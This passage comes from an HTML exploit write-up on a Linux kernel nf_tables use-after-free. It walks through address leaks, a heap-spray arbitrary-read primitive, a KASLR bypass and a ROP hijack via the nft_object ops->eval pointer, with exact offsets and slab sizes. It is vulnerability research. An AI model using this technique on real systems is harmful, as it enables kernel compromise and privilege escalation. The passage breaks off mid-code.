                <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">list_head</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">next</span><span class="p">,</span> <span class="o">*</span><span class="n">prev</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>This <code class="language-plaintext highlighter-rouge">list_head</code> pointer that we leak is just a pointer to the start of the linked list of <code class="language-plaintext highlighter-rouge">nft_set</code>s, and this is a member of the <code class="language-plaintext highlighter-rouge">nft_table</code> that the set belongs to.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_table</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">list</span><span class="p">;</span>
        <span class="p">...</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">sets</span><span class="p">;</span>
        <span class="p">...</span>
<span class="p">};</span>
</code></pre></div></div>

<p>A note is that in order to create the <code class="language-plaintext highlighter-rouge">nft_rule</code> with multiple <code class="language-plaintext highlighter-rouge">objref_map</code> expressions, we cannot point the expressions to the original set that has the <code class="language-plaintext highlighter-rouge">NFT_SET_ANONYMOUS</code> flag and we have to create a new <code class="language-plaintext highlighter-rouge">nft_set</code> without that flag to point our expressions to. This is because an anonymous set can only be bound once by an expression while there is no such restriction if the set isn’t anonymous. So after creating our second set, the linked list of <code class="language-plaintext highlighter-rouge">nft_set</code>s looks like this.</p>

<svg viewBox="0 0 580 100" xmlns="http://www.w3.org/2000/svg" role="img" aria-labelledby="title desc">
  <title id="title">Linked list of nft_sets</title>
  <desc id="desc">Three boxes connected by arrows: table-&gt;sets (start of linked list), Anonymous nft_set&apos;s list_head, Second nft_set&apos;s list_head</desc>

  <style>
    text { font-family: ui-monospace, 'SFMono-Regular', Menlo, monospace; }
  </style>

  <!-- Box 1 -->
  <rect x="10" y="18" width="148" height="64" rx="6" fill="white" stroke="#3b82f6" stroke-width="1.5" />
  <text x="84" y="44" text-anchor="middle" fill="#18181b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">table-&gt;sets</text>
  <text x="84" y="60" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">(start of</text>
  <text x="84" y="74" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">linked list)</text>

  <!-- Arrow 1 → 2 -->
  <defs>
    <marker id="arr" markerWidth="8" markerHeight="6" refX="7" refY="3" orient="auto">
      <polygon points="0 0, 8 3, 0 6" fill="#71717a" />
    </marker>
  </defs>
  <line x1="158" y1="50" x2="210" y2="50" stroke="#71717a" stroke-width="1.8" marker-end="url(#arr)" />

  <!-- Box 2 -->
  <rect x="214" y="18" width="148" height="64" rx="6" fill="white" stroke="#3b82f6" stroke-width="1.5" />
  <text x="288" y="44" text-anchor="middle" fill="#18181b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">Anonymous</text>
  <text x="288" y="60" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">nft_set&apos;s</text>
  <text x="288" y="74" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">list_head</text>

  <!-- Arrow 2 → 3 -->
  <line x1="362" y1="50" x2="414" y2="50" stroke="#71717a" stroke-width="1.8" marker-end="url(#arr)" />

  <!-- Box 3 -->
  <rect x="418" y="18" width="148" height="64" rx="6" fill="white" stroke="#3b82f6" stroke-width="1.5" />
  <text x="492" y="44" text-anchor="middle" fill="#18181b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">Second nft_set&apos;s</text>
  <text x="492" y="62" text-anchor="middle" fill="#52525b" font-size="11" font-family="ui-monospace, 'SFMono-Regular', Menlo, monospace">list_head</text>
</svg>

<p>To actually allocate the <code class="language-plaintext highlighter-rouge">nft_rule</code> with kmalloc-256, we just need to create a rule with 4 <code class="language-plaintext highlighter-rouge">objref_map</code> expressions, because the rule attributes itself will take up 24 bytes and each <code class="language-plaintext highlighter-rouge">objref_map</code> expression takes up 48 bytes. We just have to spray the heap with multiple rules that are like this and send a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_GETSETELEM</code> which will leak the address of the <code class="language-plaintext highlighter-rouge">sets</code> member in the <code class="language-plaintext highlighter-rouge">nft_table</code>.</p>

<p>If we use the address of the <code class="language-plaintext highlighter-rouge">sets</code> member as the leak source pointer, the next read will be the address of the anonymous set’s <code class="language-plaintext highlighter-rouge">list_head</code>, which also happens to be the starting address of that set on the heap (this is the member with the identifier <code class="language-plaintext highlighter-rouge">list</code> in the <code class="language-plaintext highlighter-rouge">nft_set</code>). To craft a primitive that allows the read of an arbitrary address, we can make use of <code class="language-plaintext highlighter-rouge">nft_chain</code> allocations. When we create an <code class="language-plaintext highlighter-rouge">nft_chain</code>, we can specify the udata (i.e. userdata) that is associated with the chain. During the creation of an <code class="language-plaintext highlighter-rouge">nft_chain</code>, <code class="language-plaintext highlighter-rouge">nf_tables_addchain</code> is called which calls <code class="language-plaintext highlighter-rouge">nla_memdup</code> [1] that eventually calls <code class="language-plaintext highlighter-rouge">kmemdup</code> that does a <code class="language-plaintext highlighter-rouge">kmalloc_track_caller</code> [2] to allocate a chunk of memory of the size of the userdata and copies the supplied <code class="language-plaintext highlighter-rouge">nft_chain</code> userdata over [3]. When we specify a chain userdata of size 256, this performs the allocation using kmalloc-256. The <code class="language-plaintext highlighter-rouge">nft_chain</code> would fill the UAF slot, becoming an arbitrary read primitive and we just need to supply whatever address we want to use as the source pointer for a read at offset 32 of the chain userdata.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_addchain</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="n">u8</span> <span class="n">family</span><span class="p">,</span> <span class="n">u8</span> <span class="n">genmask</span><span class="p">,</span>
                              <span class="n">u8</span> <span class="n">policy</span><span class="p">,</span> <span class="n">u32</span> <span class="n">flags</span><span class="p">,</span>
                              <span class="k">struct</span> <span class="n">netlink_ext_ack</span> <span class="o">*</span><span class="n">extack</span><span class="p">)</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_CHAIN_USERDATA</span><span class="p">])</span> <span class="p">{</span>
                <span class="n">chain</span><span class="o">-&gt;</span><span class="n">udata</span> <span class="o">=</span> <span class="n">nla_memdup</span><span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_CHAIN_USERDATA</span><span class="p">],</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">chain</span><span class="o">-&gt;</span><span class="n">udata</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
                        <span class="k">goto</span> <span class="n">err_destroy_chain</span><span class="p">;</span>
                <span class="p">}</span>
                <span class="n">chain</span><span class="o">-&gt;</span><span class="n">udlen</span> <span class="o">=</span> <span class="n">nla_len</span><span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_CHAIN_USERDATA</span><span class="p">]);</span>
        <span class="p">}</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">nla_memdup</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">src</span><span class="p">,</span> <span class="n">gfp_t</span> <span class="n">gfp</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">return</span> <span class="n">kmemdup</span><span class="p">(</span><span class="n">nla_data</span><span class="p">(</span><span class="n">src</span><span class="p">),</span> <span class="n">nla_len</span><span class="p">(</span><span class="n">src</span><span class="p">),</span> <span class="n">gfp</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="o">*</span><span class="nf">kmemdup</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">src</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">,</span> <span class="n">gfp_t</span> <span class="n">gfp</span><span class="p">)</span>
<span class="p">{</span>
        <span class="kt">void</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>

        <span class="n">p</span> <span class="o">=</span> <span class="n">kmalloc_track_caller</span><span class="p">(</span><span class="n">len</span><span class="p">,</span> <span class="n">gfp</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">p</span><span class="p">)</span>
                <span class="n">memcpy</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">src</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
        <span class="k">return</span> <span class="n">p</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To reiterate, we wanted to leak our anonymous set’s address next and all that needs to be done here is to write the leaked address of the table’s <code class="language-plaintext highlighter-rouge">sets</code> member at offset 32 of the <code class="language-plaintext highlighter-rouge">nft_chain</code> userdata (which we create to be size 256) and do a heap spray. Afterwards, perform the read with a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_GETSETELEM</code>.</p>

<h2 id="bypassing-kaslr">Bypassing KASLR</h2>

<p>We want to begin by obtaining the base address of the loaded <code class="language-plaintext highlighter-rouge">nf_tables</code> <code class="language-plaintext highlighter-rouge">.text</code> section. Initially, we want to leak a function pointer for an <code class="language-plaintext highlighter-rouge">nf_tables</code> function using the leaked set address that we obtained and then use that to get the <code class="language-plaintext highlighter-rouge">nf_tables</code> base address. A prime candidate is the <code class="language-plaintext highlighter-rouge">set-&gt;ops</code> pointer (a pointer to <code class="language-plaintext highlighter-rouge">nft_set_ops</code>). This is at offset 192 of the set so we just use the read primitive to read whatever is stored at the set base address + 192. Next, we can leak the <code class="language-plaintext highlighter-rouge">ops-&gt;lookup</code> function pointer which is at offset 0 from the beginning of <code class="language-plaintext highlighter-rouge">nft_set_ops</code>. This will leak the address of the function <code class="language-plaintext highlighter-rouge">nft_hash_lookup</code> because our set has its actual <code class="language-plaintext highlighter-rouge">ops</code> assigned to be <code class="language-plaintext highlighter-rouge">nft_set_hash_type.ops</code> since it is of type <code class="language-plaintext highlighter-rouge">nft_set_hash_type</code>. The <code class="language-plaintext highlighter-rouge">ops</code> that is assigned can be controlled by flags set by the user when creating the set.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_set_ops</span> <span class="p">{</span>
        <span class="n">bool</span>                    <span class="p">(</span><span class="o">*</span><span class="n">lookup</span><span class="p">)(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span>
                                          <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                          <span class="k">const</span> <span class="n">u32</span> <span class="o">*</span><span class="n">key</span><span class="p">,</span>
                                          <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_ext</span> <span class="o">**</span><span class="n">ext</span><span class="p">);</span>

        <span class="p">...</span>
<span class="p">}</span>

<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_type</span> <span class="n">nft_set_hash_type</span> <span class="o">=</span> <span class="p">{</span>
        <span class="p">.</span><span class="n">features</span>       <span class="o">=</span> <span class="n">NFT_SET_MAP</span> <span class="o">|</span> <span class="n">NFT_SET_OBJECT</span><span class="p">,</span>
        <span class="p">.</span><span class="n">ops</span>            <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">privsize</span>       <span class="o">=</span> <span class="n">nft_hash_privsize</span><span class="p">,</span>
                <span class="p">.</span><span class="n">elemsize</span>       <span class="o">=</span> <span class="n">offsetof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_hash_elem</span><span class="p">,</span> <span class="n">ext</span><span class="p">),</span>
                <span class="p">.</span><span class="n">estimate</span>       <span class="o">=</span> <span class="n">nft_hash_estimate</span><span class="p">,</span>
                <span class="p">.</span><span class="n">init</span>           <span class="o">=</span> <span class="n">nft_hash_init</span><span class="p">,</span>
                <span class="p">.</span><span class="n">destroy</span>        <span class="o">=</span> <span class="n">nft_hash_destroy</span><span class="p">,</span>
                <span class="p">.</span><span class="n">insert</span>                 <span class="o">=</span> <span class="n">nft_hash_insert</span><span class="p">,</span>
                <span class="p">.</span><span class="n">activate</span>       <span class="o">=</span> <span class="n">nft_hash_activate</span><span class="p">,</span>
                <span class="p">.</span><span class="n">deactivate</span>     <span class="o">=</span> <span class="n">nft_hash_deactivate</span><span class="p">,</span>
                <span class="p">.</span><span class="n">flush</span>          <span class="o">=</span> <span class="n">nft_hash_flush</span><span class="p">,</span>
                <span class="p">.</span><span class="n">remove</span>                 <span class="o">=</span> <span class="n">nft_hash_remove</span><span class="p">,</span>
                <span class="p">.</span><span class="n">lookup</span>                 <span class="o">=</span> <span class="n">nft_hash_lookup</span><span class="p">,</span>
                <span class="p">.</span><span class="n">walk</span>           <span class="o">=</span> <span class="n">nft_hash_walk</span><span class="p">,</span>
                <span class="p">.</span><span class="n">get</span>            <span class="o">=</span> <span class="n">nft_hash_get</span><span class="p">,</span>
        <span class="p">},</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Using the address of this function we can get the base address of the <code class="language-plaintext highlighter-rouge">.text</code> section of <code class="language-plaintext highlighter-rouge">nf_tables</code>. With the <code class="language-plaintext highlighter-rouge">nf_tables</code> base address, we can use it to leak a function in the <code class="language-plaintext highlighter-rouge">.text</code> section of <code class="language-plaintext highlighter-rouge">vmlinux</code> itself. Since there are a plethora of <code class="language-plaintext highlighter-rouge">kfree</code> calls within the <code class="language-plaintext highlighter-rouge">nf_tables_api</code>, we can use the relative offset of those calls to get the address of the actual <code class="language-plaintext highlighter-rouge">kfree</code> function. A candidate to achieve this is the function <code class="language-plaintext highlighter-rouge">nft_set_destroy</code>, which contains a call to <code class="language-plaintext highlighter-rouge">kfree</code>. We simply trigger the read primitive using the <code class="language-plaintext highlighter-rouge">nf_tables</code> base address plus <code class="language-plaintext highlighter-rouge">kfree</code> invocation offset within <code class="language-plaintext highlighter-rouge">nft_set_destroy</code>. With the relative jump offset to the true <code class="language-plaintext highlighter-rouge">kfree</code> function in <code class="language-plaintext highlighter-rouge">nft_set_destroy</code>, we can determine the <code class="language-plaintext highlighter-rouge">kfree</code> function definition address and hence the base address of the kernel <code class="language-plaintext highlighter-rouge">.text</code> section.</p>

<h2 id="hijacking-execution-flow">Hijacking execution flow</h2>

<h3 id="leaking-the-address-of-an-nft_object">Leaking the address of an <code class="language-plaintext highlighter-rouge">nft_object</code></h3>

<p>One way of triggering a ROP chain to hijack execution flow is to make use of the <code class="language-plaintext highlighter-rouge">eval</code> function pointer of the <code class="language-plaintext highlighter-rouge">ops</code> member of an <code class="language-plaintext highlighter-rouge">nft_object</code>. This function pointer can be easily triggered by just registering an <code class="language-plaintext highlighter-rouge">nft_expr</code> of <code class="language-plaintext highlighter-rouge">objref</code> type as part of a rule and then sending a packet which will cause this expression to be processed. To execute our ROP chain, we leverage the UAF to cause a type confusion where the supposed <code class="language-plaintext highlighter-rouge">eval</code> function pointer is actually pointing to some region in memory containing our payload. An <code class="language-plaintext highlighter-rouge">nft_expr</code> of <code class="language-plaintext highlighter-rouge">objref</code> type holds a pointer to an <code class="language-plaintext highlighter-rouge">nft_object</code> as its private data [1] and upon evaluation, it simply delegates the evaluation to its <code class="language-plaintext highlighter-rouge">nft_object</code>’s <code class="language-plaintext highlighter-rouge">eval</code> function [2]. Since our UAF involves a freed <code class="language-plaintext highlighter-rouge">nft_object</code> that we can freely replace, this makes an <code class="language-plaintext highlighter-rouge">nft_expr</code> of <code class="language-plaintext highlighter-rouge">objref</code> type a perfect candidate to abuse for hijacking execution flow.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_objref_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
			   <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span>
			   <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">tb</span><span class="p">[])</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span> <span class="o">=</span> <span class="n">nft_objref_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>
	<span class="n">u8</span> <span class="n">genmask</span> <span class="o">=</span> <span class="n">nft_genmask_next</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">);</span>
	<span class="n">u32</span> <span class="n">objtype</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_IMM_NAME</span><span class="p">]</span> <span class="o">||</span>
	    <span class="o">!</span><span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_IMM_TYPE</span><span class="p">])</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

	<span class="n">objtype</span> <span class="o">=</span> <span class="n">ntohl</span><span class="p">(</span><span class="n">nla_get_be32</span><span class="p">(</span><span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_IMM_TYPE</span><span class="p">]));</span>
	<span class="n">obj</span> <span class="o">=</span> <span class="n">nft_obj_lookup</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span>
			     <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_IMM_NAME</span><span class="p">],</span> <span class="n">objtype</span><span class="p">,</span>
			     <span class="n">genmask</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">obj</span><span class="p">))</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

	<span class="n">nft_objref_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">)</span> <span class="o">=</span> <span class="n">obj</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">obj</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>

	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_objref_eval</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span>
			    <span class="k">struct</span> <span class="n">nft_regs</span> <span class="o">*</span><span class="n">regs</span><span class="p">,</span>
			    <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_pktinfo</span> <span class="o">*</span><span class="n">pkt</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span> <span class="o">=</span> <span class="n">nft_objref_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>

	<span class="n">obj</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">eval</span><span class="p">(</span><span class="n">obj</span><span class="p">,</span> <span class="n">regs</span><span class="p">,</span> <span class="n">pkt</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">ops</code> member is at offset 128 [1] from the start of the <code class="language-plaintext highlighter-rouge">nft_object</code> and the eval function is at offset 0 [2] of the ops member. We simply need to make sure that the address of the start of our ROP chain is stored at offset 128 of whatever we replace the freed UAF slot with and this conveniently means the first 128 bytes of the slot are free for us to use to store the payload.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_object</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">list_head</span>        <span class="n">list</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">rhlist_head</span>      <span class="n">rhlhead</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_object_hash_key</span>      <span class="n">key</span><span class="p">;</span>
        <span class="n">u32</span>                     <span class="n">genmask</span><span class="o">:</span><span class="mi">2</span><span class="p">,</span>
                                <span class="nl">use:</span><span class="mi">30</span><span class="p">;</span>
        <span class="n">u64</span>                     <span class="n">handle</span><span class="p">;</span>
        <span class="n">u16</span>                     <span class="n">udlen</span><span class="p">;</span>
        <span class="n">u8</span>                      <span class="o">*</span><span class="n">udata</span><span class="p">;</span>
        <span class="cm">/* runtime data below here */</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_object_ops</span>     <span class="o">*</span><span class="n">ops</span> <span class="n">____cacheline_aligned</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="kt">unsigned</span> <span class="kt">char</span>           <span class="n">data</span><span class="p">[]</span>
                <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_object_ops</span> <span class="p">{</span>
        <span class="kt">void</span>                    <span class="p">(</span><span class="o">*</span><span class="n">eval</span><span class="p">)(</span><span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
                                        <span class="k">struct</span> <span class="n">nft_regs</span> <span class="o">*</span><span class="n">regs</span><span class="p">,</span>
                                        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_pktinfo</span> <span class="o">*</span><span class="n">pkt</span><span class="p">);</span>
        <span class="kt">unsigned</span> <span class="kt">int</span>            <span class="n">size</span><span class="p">;</span>
        <span class="kt">int</span>                     <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                        <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="k">const</span> <span class="n">tb</span><span class="p">[],</span>
                                        <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">);</span>
        <span class="kt">void</span>                    <span class="p">(</span><span class="o">*</span><span class="n">destroy</span><span class="p">)(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                           <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">);</span>
        <span class="kt">int</span>                     <span class="p">(</span><span class="o">*</span><span class="n">dump</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                        <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">,</span>
                                        <span class="n">bool</span> <span class="n">reset</span><span class="p">);</span>
        <span class="kt">void</span>                    <span class="p">(</span><span class="o">*</span><span class="n">update</span><span class="p">)(</span><span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">,</span>
                                          <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">newobj</span><span class="p">);</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_object_type</span>    <span class="o">*</span><span class="n">type</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Consequently, the address of the start of our ROP chain is just the base address of the freed <code class="language-plaintext highlighter-rouge">nft_object</code>, which we now have to leak. Since the anonymous <code class="language-plaintext highlighter-rouge">nft_set</code> has a reference to the freed <code class="language-plaintext highlighter-rouge">nft_object</code> through its <code class="language-plaintext highlighter-rouge">nft_set_elem</code>, we can just leak the address of the freed memory location from the <code class="language-plaintext highlighter-rouge">nft_set_elem</code>. As mentioned earlier, our anonymous <code class="language-plaintext highlighter-rouge">nft_set</code> has type <code class="language-plaintext highlighter-rouge">nft_set_hash_type</code> and has space reserved [1] for a <code class="language-plaintext highlighter-rouge">struct nft_hash</code> plus the linked list heads for its hash buckets [2].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newset</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
			    <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">ops</span> <span class="o">=</span> <span class="n">nft_select_set_ops</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">nla</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">desc</span><span class="p">,</span> <span class="n">policy</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">ops</span><span class="p">))</span>
		<span class="k">return</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">ops</span><span class="p">);</span>

	<span class="n">udlen</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_USERDATA</span><span class="p">])</span>
		<span class="n">udlen</span> <span class="o">=</span> <span class="n">nla_len</span><span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_USERDATA</span><span class="p">]);</span>

	<span class="n">size</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">privsize</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span>
		<span class="n">size</span> <span class="o">=</span> <span class="n">ops</span><span class="o">-&gt;</span><span class="n">privsize</span><span class="p">(</span><span class="n">nla</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">desc</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">alloc_size</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">set</span><span class="p">)</span> <span class="o">+</span> <span class="n">size</span> <span class="o">+</span> <span class="n">udlen</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">alloc_size</span> <span class="o">&lt;</span> <span class="n">size</span> <span class="o">||</span> <span class="n">alloc_size</span> <span class="o">&gt;</span> <span class="n">INT_MAX</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
	<span class="n">set</span> <span class="o">=</span> <span class="n">kvzalloc</span><span class="p">(</span><span class="n">alloc_size</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_type</span> <span class="n">nft_set_hash_type</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">features</span>	<span class="o">=</span> <span class="n">NFT_SET_MAP</span> <span class="o">|</span> <span class="n">NFT_SET_OBJECT</span><span class="p">,</span>
	<span class="p">.</span><span class="n">ops</span>		<span class="o">=</span> <span class="p">{</span>
		<span class="p">.</span><span class="n">privsize</span>       <span class="o">=</span> <span class="n">nft_hash_privsize</span><span class="p">,</span>
		<span class="p">...</span>
	<span class="p">},</span>
<span class="p">};</span>

<span class="k">static</span> <span class="n">u64</span> <span class="nf">nft_hash_privsize</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[],</span>
			     <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_desc</span> <span class="o">*</span><span class="n">desc</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_hash</span><span class="p">)</span> <span class="o">+</span>
